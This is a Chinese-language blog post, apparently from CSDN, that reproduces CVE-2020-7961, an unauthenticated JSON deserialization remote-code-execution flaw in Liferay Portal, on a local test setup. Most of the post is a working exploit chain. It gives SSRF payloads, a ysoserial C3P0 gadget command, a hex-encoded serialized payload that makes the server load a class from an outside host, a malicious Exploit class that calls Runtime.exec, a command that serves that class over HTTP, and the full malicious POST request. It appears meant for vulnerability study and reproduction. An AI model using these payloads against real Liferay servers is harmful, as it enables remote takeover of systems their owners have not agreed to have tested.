Liferay Portal CVE-2020-7961

最新推荐文章于 2022-10-28 15:20:49 发布
最新推荐文章于 2022-10-28 15:20:49 发布
阅读量6.2k 收藏 3
点赞数 4
分类专栏: 安全 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/105957576
版权

一、产品介绍

    Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用。该项目使用了Web、EJB以及JMS等技术,特别是其前台界面部分使用Struts 框架技术,基于XML的portlet配置文件可以自由地动态扩展,使用了Web Services来支持一些远程信息的获取,使用 Apache Lucene实现全文检索功能。

 

二、漏洞介绍

    Liferay Portal 多个比较严重的 JSON fan 反序列化漏洞,影响 Liferay Portal 6.1、6.2、7.0、7.1 以及 7.2 版本,这些漏洞可以通过 Json web 进行未授权远程代码执行。

影响范围:

Liferay Portal 6.1.X

Liferay Portal 6.2.X

Liferay Portal 7.0.X

Liferay Portal 7.1.X

Liferay Portal 7.2.X

 

三、poc

1、SSRF1:

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:javax.swing.JEditorPane={"page":"http://10.10.10.10","loginTimeout":0}

2、SSRF2:

cmd={"/expandocolumn/add-column":{}}&p_auth=Gyr2NhlX&formDate=1585307550388&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.JndiRefForwardingDataSource={"jndiName":"rmi://10.10.10.10/xxx","loginTimeout":0}

3、反序列化:

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED000573720028636F6D2E6D6368616E67652E76322E633370302E506F6F6C4261636B656444617461536F75726365DE22CD6CC7FF7FA802000078720035636F6D2E6D6368616E67652E76322E633370302E696D706C2E4162737472616374506F6F6C4261636B656444617461536F75726365000000000000000103000078720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000010300084900106E756D48656C706572546872656164734C0018636F6E6E656374696F6E506F6F6C44617461536F757263657400244C6A617661782F73716C2F436F6E6E656374696F6E506F6F6C44617461536F757263653B4C000E64617461536F757263654E616D657400124C6A6176612F6C616E672F537472696E673B4C000A657874656E73696F6E7374000F4C6A6176612F7574696C2F4D61703B4C0014666163746F7279436C6173734C6F636174696F6E71007E00044C000D6964656E74697479546F6B656E71007E00044C00037063737400224C6A6176612F6265616E732F50726F70657274794368616E6765537570706F72743B4C00037663737400224C6A6176612F6265616E732F5665746F61626C654368616E6765537570706F72743B7870770200017372003D636F6D2E6D6368616E67652E76322E6E616D696E672E5265666572656E6365496E6469726563746F72245265666572656E636553657269616C697A6564621985D0D12AC2130200044C000B636F6E746578744E616D657400134C6A617661782F6E616D696E672F4E616D653B4C0003656E767400154C6A6176612F7574696C2F486173687461626C653B4C00046E616D6571007E000A4C00097265666572656E63657400184C6A617661782F6E616D696E672F5265666572656E63653B7870707070737200166A617661782E6E616D696E672E5265666572656E6365E8C69EA2A8E98D090200044C000561646472737400124C6A6176612F7574696C2F566563746F723B4C000C636C617373466163746F727971007E00044C0014636C617373466163746F72794C6F636174696F6E71007E00044C0009636C6173734E616D6571007E00047870737200106A6176612E7574696C2E566563746F72D9977D5B803BAF010300034900116361706163697479496E6372656D656E7449000C656C656D656E74436F756E745B000B656C656D656E74446174617400135B4C6A6176612F6C616E672F4F626A6563743B78700000000000000000757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000A707070707070707070707874002D2F2F3531302E44455345522E38302E31313038332E7674702E73656375726974792E6875617765692E636F6D2F740004687474707400076578706C6F697470707070770400000000787702000178;"}

 

四、环境安装

下载集成了tomcat的liferay

https://cdn.lfrs.sl/releases.liferay.com/portal/7.1.2-ga3/liferay-ce-portal-tomcat-7.1.2-ga3-20190107144105508.7z

解压,修改tomcat启动端口,防止与其他端口冲突

加上调试接口,便于后续idea调试

SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8788   

双击启动startup.bat,如果tomcat报错,可能是调用了系统环境变量中的tomcat,删除系统环境变量中的tomcat即可。

 

五、构造poc

 

使用ysoserial生成poc二进制文件

java -jar ysoserial.jar C3P0 "http://127.0.0.1:8989/:Exploit" > 1.ser

再将二进制文件转换成hex字节码,转换源码如下:

import java.io.*;

public class yso2hex {

    public String encodeHex(InputStream fi) throws IOException {

        int size;

        String hexStr="";

        while ((size=fi.read())!=-1){

            String byteChar = Integer.toHexString(size);

            if(byteChar.length()<2) {

                byteChar = "0" + byteChar;

            }

            hexStr = hexStr + byteChar;

        }

        return hexStr;

    }

    public static void main(String[] args) throws IOException {

        FileInputStream fi  = new FileInputStream(new File("D:\\penetration\\poc\\1.ser"));

        yso2hex obj = new yso2hex();

        String pocStr = obj.encodeHex(fi);

        System.out.println(pocStr);

    }

}

转换结果如下,如果你发现你转换结果是F开头的,可能是执行ysoserial命令时使用了powershell,换成cmd。

aced000573720028636f6d2e6d6368616e67652e76322e633370302e506f6f6c4261636b656444617461536f75726365de22cd6cc7ff7fa802000078720035636f6d2e6d6368616e67652e76322e633370302e696d706c2e4162737472616374506f6f6c4261636b656444617461536f75726365000000000000000103000078720031636f6d2e6d6368616e67652e76322e633370302e696d706c2e506f6f6c4261636b656444617461536f757263654261736500000000000000010300084900106e756d48656c706572546872656164734c0018636f6e6e656374696f6e506f6f6c44617461536f757263657400244c6a617661782f73716c2f436f6e6e656374696f6e506f6f6c44617461536f757263653b4c000e64617461536f757263654e616d657400124c6a6176612f6c616e672f537472696e673b4c000a657874656e73696f6e7374000f4c6a6176612f7574696c2f4d61703b4c0014666163746f7279436c6173734c6f636174696f6e71007e00044c000d6964656e74697479546f6b656e71007e00044c00037063737400224c6a6176612f6265616e732f50726f70657274794368616e6765537570706f72743b4c00037663737400224c6a6176612f6265616e732f5665746f61626c654368616e6765537570706f72743b7870770200017372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e000a4c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f727971007e00044c0014636c617373466163746f72794c6f636174696f6e71007e00044c0009636c6173734e616d6571007e00047870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400074578706c6f6974740018687474703a2f2f31302e37302e362e3133303a393939392f7400076578706c6f697470707070770400000000787702000178

C3P0会在http://127.0.0.1:8989/下加载恶意类Exploit,其中恶意类如下所示:

public class Exploit {

    public Exploit(){

        try {

            Runtime.getRuntime().exec("calc");

        } catch (Exception e) {

        }

    }

}

如需要回显,可使用下面源码,通过获取context得到相关接口:

import com.liferay.portal.kernel.security.access.control.AccessControlUtil;

import com.liferay.portal.kernel.security.auth.AccessControlContext;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.io.OutputStream;

 

public class Exploit {

    public Exploit(){

        try {

            Runtime.getRuntime().exec("calc");

            AccessControlContext accessControlContext = AccessControlUtil.getAccessControlContext();

            HttpServletResponse response =  accessControlContext.getResponse();

            OutputStream ot =  response.getOutputStream();

            ot.write("hei hei hei".getBytes());

            ot.flush();

            ot.close();

        } catch (Exception e) {

 

        }

    }

}

将上面源码保存于Exploit.java,然后使用下面命令进行编译

javac Exploit.java

然后使用python启动一个web服务,命令如下:

Python3 -m http.server 8989

注:windows下敲命令如果使用powershell,注意编码,建议使用cmd

 

六、构造恶意报文

恶意报文如下,将前面hex字节码填入其中。

POST /api/jsonws/invoke HTTP/1.1

Host: 127.0.0.1:9088

Content-Length: 2305

Content-Type: application/x-www-form-urlencoded

Connection: close

 

cmd={"/expandocolumn/add-column":{}}&p_auth=rA56NUR1&formDate=1587366607241&tableId=1&name=1&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED000573720028636F6D2E6D6368616E67652E76322E633370302E506F6F6C4261636B656444617461536F75726365DE22CD6CC7FF7FA802000078720035636F6D2E6D6368616E67652E76322E633370302E696D706C2E4162737472616374506F6F6C4261636B656444617461536F75726365000000000000000103000078720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000010300084900106E756D48656C706572546872656164734C0018636F6E6E656374696F6E506F6F6C44617461536F757263657400244C6A617661782F73716C2F436F6E6E656374696F6E506F6F6C44617461536F757263653B4C000E64617461536F757263654E616D657400124C6A6176612F6C616E672F537472696E673B4C000A657874656E73696F6E7374000F4C6A6176612F7574696C2F4D61703B4C0014666163746F7279436C6173734C6F636174696F6E71007E00044C000D6964656E74697479546F6B656E71007E00044C00037063737400224C6A6176612F6265616E732F50726F70657274794368616E6765537570706F72743B4C00037663737400224C6A6176612F6265616E732F5665746F61626C654368616E6765537570706F72743B7870770200017372003D636F6D2E6D6368616E67652E76322E6E616D696E672E5265666572656E6365496E6469726563746F72245265666572656E636553657269616C697A6564621985D0D12AC2130200044C000B636F6E746578744E616D657400134C6A617661782F6E616D696E672F4E616D653B4C0003656E767400154C6A6176612F7574696C2F486173687461626C653B4C00046E616D6571007E000A4C00097265666572656E63657400184C6A617661782F6E616D696E672F5265666572656E63653B7870707070737200166A617661782E6E616D696E672E5265666572656E6365E8C69EA2A8E98D090200044C000561646472737400124C6A6176612F7574696C2F566563746F723B4C000C636C617373466163746F727971007E00044C0014636C617373466163746F72794C6F636174696F6E71007E00044C0009636C6173734E616D6571007E00047870737200106A6176612E7574696C2E566563746F72D9977D5B803BAF010300034900116361706163697479496E6372656D656E7449000C656C656D656E74436F756E745B000B656C656D656E74446174617400135B4C6A6176612F6C616E672F4F626A6563743B78700000000000000000757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000A70707070707070707070787400074578706C6F6974740018687474703A2F2F31302E37302E362E3133303A393939392F7400076578706C6F697470707070770400000000787702000178;"}

打他:

 

六、调试

将项目导入IDEA进行调试,将如下目录右键add as library

增加remote configurations,并做如下配置:

启动后即可愉快的调试了。

5wimming
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
liferay-portal-src-6.0.6-20110225.part1
06-18
liferay-portal-src-6.0.6-20110225.part1
ysoserial-0.0.2
12-25
weblogic反序列化漏洞 测试用的 有需要的同学拿去用
远程反序列化rce漏洞_Liferay Portal CE 系统反序列化RCE漏洞复现(CVE-2020-7961
weixin_42412939的博客
01-15 733
Liferay Portal CE是一款用来快速构建网站的开源系统。在7.2.1 CE GA2之前的Liferay Portal中,对不可信数据的反序列化允许远程攻击者通过JSON web服务(JSONWS)执行任意代码。官方网站https://www.oschina.net影响范围Liferay Portal 6.1.XLiferay Portal 6.2.XLiferay Portal 7.0...
渗透学习笔记
ywd171的博客
10-28 5435
信息收集、渗透攻击、权限提升、内网渗透
JAVA反序列化漏洞简述
告白的博客
08-08 2241
0x00 漏洞原理 我们需要保存某一个对象的某一一个时间的状态信息,进行一些操作,比如利用反序列化将程序运行的对象状态以二进制形式储存在文件系统中,然后可以在另外一个程序中对序列化后的对象状态数据进行反序列化操作回复对象,可以有效的实现多平台之间的通信,对象持久化储存。 0x01 漏洞描述必备*知识点* #序列化和反序列化 序列化 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。 反序列化:从存储区中读取该数据,并将
Liferay RCE(CVE-2020-7961)
EC_Carrot的博客
07-10 328
影响范围 Liferay Portal 6.1.X Liferay Portal 6.2.X Liferay Portal 7.0.X Liferay Portal 7.1.X Liferay Portal 7.2.X 漏洞复现 首先准备一个恶意java文件LifExp.java public class LifExp { static { try { String[] cmd = {"bash", "-c", "touch /tmp/success"};
LiferayPortal JSONWS反序列化漏洞(CVE-2020-7961)分析
不忘初心,护天下安全!
06-28 703
2020年03月20日,Code White发现了影响Liferay Portal版本6.1、6.2、7.0、7.1和7.2的多个关键级别的JSON反序列化漏洞。它们允许通过JSON web服务API执行未经身份验证的远程代码。修复的Liferay Portal版本有6.2 GA6、7.0 GA7、7.1 GA4和7.2 GA2。Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用,以创建Web站点、内部网,以此来向适当的客户群显示符合他们的文档和应用程序
构造post_[漏洞分析]LiferayPortal JSONWS反序列化漏洞(CVE20207961)分析及Poc构造
weixin_39760206的博客
12-03 507
一、背景这是一篇4月份复现LiferayPortalrce漏洞时的笔记,当时忙着做渗透没空整理,现在发出来就当是学习JODD反序列化的记录吧,里面2个Gadget com.mchange.v2.c3p0.JndiRefForwardingDataSource和com.mchange.v2.c3p0.WrapperConnectionPoolDataSource的Poc构造过程,后面还有一...
Liferay Portal Json Web Service 反序列化漏洞(CVE-2020-7961)
晓得哥的博客
04-01 1950
作者:Longofo@知道创宇404实验室 时间:2020年3月27日 原文地址:https://paper.seebug.org/1162/ 英文版本:https://paper.seebug.org/1163/ 之前在CODE WHITE上发布了一篇关于Liferay Portal JSON Web Service RCE的漏洞,之前是小伙伴在处理这个漏洞,后面自己也去看了。Liferay P...
liferay-portal-sql-6.1.1-ce-ga2-20120731132656558
10-18
liferay-portal-sql-6.1.1-ce-ga2-20120731132656558
liferay-portal-src-6.0.6-20110225.part2
06-18
liferay-portal-src-6.0.6-20110225.part2
liferay-developer-guide-6.0_liferay_
10-04
liferay developer guide
Liferay Portal-开源
04-14
Liferay Portal是全球领先的企业开源门户框架,提供集成的Web发布和内容管理... 在GitHub上查看我们的最新版本:https://github.com/liferay/liferay-portal/releases https://github.com/liferay/liferay-ide/releases
spf、dkim、dmarc介绍与邮件伪造研究
热门推荐
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-18 1万+
文章目录spf、dkim、dmarc介绍SPFDKIMDMARC测试工具Swaks spf、dkim、dmarc介绍 SPF SPF(Sender Policy Framework)发件人策略框架 SPF 是为了防范伪造发件人地址发送垃圾邮件而提出的一种开放式标准,是一种以 IP 地址认证电子邮件发件人身份的技术。域名所有者通过在 DNS 中发布 SPF 记录来授权合法使用该域名发送邮件的 IP 地址。 当在 DNS 中定义了域名的 SPF 记录后,为了确认邮件声称发件人不是伪造的,邮件接收方首先检查邮件域
手机app逆向、渗透测试基础工具介绍
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-15 7524
手机app逆向基础工具介绍1、夜神模拟器2、Androidkiller3、burpsuite 本文介绍了三款手机软件逆向工具: 模拟器:夜神模拟器 apk编辑器:Androidkiller 代理抓包器:burpsuite 1、夜神模拟器 夜神模拟器是一款可以在mac或者windows上运行的模拟器,用于运行手机软件。 下载地址:https://www.yeshen.com/ 下载后安装即可。...
使用burpsuite对安卓软件进行抓包
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
04-01 6682
目录一、burpsuite设置二、模拟器设置三、安装证书四、愉快的抓包 相关资源下载参考:https://blog.csdn.net/qq_34101364/article/details/104883675 一、burpsuite设置 安装教程:https://blog.csdn.net/LUOBIKUN/article/details/87457545 打开burpsuite,按如下步骤操作,...
搭建dnslog、weblog平台
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
09-26 6206
文章目录a、前期准备b、搭建 渗透测试的时候,对于命令注入、反序列化等无回显漏洞,dnslog或者weblog是一个必不可少的平台。 不想搭建,可使用免费版:http://dnslog.cn/,不过有时效限制 下面是我的搭建过程,由于使用了别人做好的docker,所以总体搭建过程较为简单。 a、前期准备 一个公网服务器,一个域名(有的教程说要两个域名,一个足够了),我这里买的都是最低端的,一年总共也就一百来块,足够用了。 下面是我的域名配置: 配置A记录,子域名ns1,解析到 7.7.7.7(你买的公网i
springboot 任意文件下载漏洞 CVE-2021-21234
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-02 5566
文章目录复现修复 复现 项目地址:https://github.com/cristianeph/vulnerability-actuator-log-viewer 下载后使用IDEA打开工程,该漏洞是由spring-boot-actuator-logview 0.2.13之前的版本导致的。 运行项目,打开网址 poc如下: http://localhost:8887/manage/log/view?filename=/etc/group&base=../../../../../../../../
liferay 使用手册
最新发布
11-15
Liferay 使用手册是指Liferay平台的一份详细说明文档,用于指导用户如何正确安装、配置和使用Liferay平台的各项功能和特性。 Liferay是一种开源的企业门户解决方案,它提供了许多功能和工具,方便用户快速搭建和管理自己的网站、门户或应用程序。然而,对于不熟悉Liferay的用户来说,往往需要一个指导手册来帮助他们更好地理解和使用平台。 Liferay 使用手册通常会包含以下内容: 1. 安装和部署指南:介绍如何正确安装和部署Liferay平台,并提供相应的操作步骤和注意事项。 2. 配置和管理:详细说明如何进行Liferay平台的配置和管理,包括用户管理、权限设置、主题和布局等。 3. 内容管理:介绍如何创建和管理网站的内容,包括新闻、博客、论坛等功能,并提供相应的操作示例。 4. 社交协作:解释如何使用Liferay平台进行协作和合作,包括团队和项目管理、文档共享、日历和通知等。 5. 应用程序开发:指导开发人员如何使用Liferay平台进行应用程序的开发和集成,包括使用API和插件的方式。 6. 故障排除和支持:提供常见问题的解答和故障排除的方法,以及如何获取更多的支持和帮助。 总之,Liferay 使用手册是一份重要的指导文档,它可以帮助用户快速入门和掌握Liferay平台的使用方法,提高工作效率和用户体验。用户可以根据手册中提供的步骤和示例,了解和掌握各个功能的使用方式,从而更好地利用Liferay平台来满足自己的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值